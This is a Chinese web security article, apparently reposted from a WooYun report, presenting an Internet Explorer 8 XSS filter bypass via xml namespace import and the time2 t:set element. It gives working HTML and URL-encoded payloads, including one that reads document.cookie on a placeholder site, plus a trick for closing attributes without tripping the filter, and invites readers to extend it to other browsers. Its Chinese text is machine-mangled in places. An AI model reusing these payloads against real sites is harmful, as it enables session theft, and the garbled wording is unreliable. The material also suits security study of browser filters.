|
|
|
联系客服020-83701501

IE8 xss filter bypass (xss过滤器绕过)

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
IE8 xss filter bypass (xss过滤器绕过)

简要形貌:

IE 8 XSS 过滤器绕过。感激@Sogili牛为本绕过通用性实现上提供的tricks。

具体阐明:

1. 在IE8中,大概经由 <xml> <?import> + <t:set ..> 的举措来形成1个XSS vector。

在测试历程中发现, <?import> 同样可写为 <import>。

也就是说。上面的代码都大概运行JS代码。

Default
123四56789101112131四15161718192021 &lt;html&gt;     &lt;body&gt;     &lt;div&gt;     &lt;div id="x"&gt;x&lt;/div&gt;     &lt;?xml:namespace prefix="t"&gt;     &lt;?import namespace="t" implementation="#default#time2"&gt;     &lt;t:set attributeName="innerHTML" targetElement="x" to="&amp;lt;img&amp;#11;src=x:x&amp;#11;onerror&amp;#11;=alert(1)&amp;gt;"&gt;     &lt;/div&gt;     &lt;/body&gt;     &lt;/html&gt; &lt;html&gt;     &lt;body&gt;     &lt;div&gt;     &lt;div id="x"&gt;x&lt;/div&gt;     &lt;xml:namespace prefix="t"&gt;     &lt;import namespace="t" implementation="#default#time2"&gt;     &lt;t:set attributeName="innerHTML" targetElement="x" to="&amp;lt;img&amp;#11;src=x:x&amp;#11;onerror&amp;#11;=alert(1)&amp;gt;"&gt;     &lt;/div&gt;     &lt;/body&gt;     &lt;/html&gt;

2. 操作这个技巧,我发现大概靡烂绕过IE 8 的 xss filter

测试例子以下:

Default
1 http://xsst.sinaapp.com/example/1-1.php?page=&lt;div id=x&gt;x&lt;/div&gt;&lt;xml:namespace prefix=t&gt;&lt;import namespace=t implementation=%23default%23time2&gt;&lt;t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;&gt;

要是用<?import..>,则会触发过滤器。

3. 尽管,上面这个代码,只实用于 <HTML标签>{输出在这里}</HTML标签> 的情况。

我们经常会碰着相通 <input type=221;text221; value=221;{输出在这里}221;> 的情况。

何等1来,我们必要在代码背面加之 220;> 来闭合HTML属性。

但是标题问题来啦, 220;> 会触发XSS过滤器,过滤掉我们代码中的缓慢词。

@jackmasa (https://twitter.com/jackmasa),也就是我们乌云的 @Sogili 牛,给了1个绕过的tricks, 220;x> 就不会触发XSS过滤器了, x代表利便字母。 很是感激。

何等1来,我们上面的代码大概进1步通用化。

Default
1 http://www.xxxx.com/product.php?search="id=&gt;&lt;div/id=x&gt;x&lt;/div&gt;&lt;xml:namespace prefix=t&gt;&lt;import namespace=t implementation=%23default%23time2&gt;&lt;t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;&gt;

四. 至于具体怎么操作,恩,本身本身看着办。

编辑点评:尽管这只是IE8的xss,但是读者大概经由思路蔓延,研讨下若何绕IE9大概其余阅读器,毕竟用IE8的人仍是许多的。更多的饶过xss限制的办法措施大概参考《跨站测试与操作中的绕过技术》文章。

本文作者:gainover 原文毗邻:http://wooyun.org/bugs/wooyun-2010-013883

使命编辑:梧桐雨

本文由网络安全攻防研讨室(www.91ri.org)音讯安全小组搜集整顿,转载请注明来因!

数安新闻+更多

证书相关+更多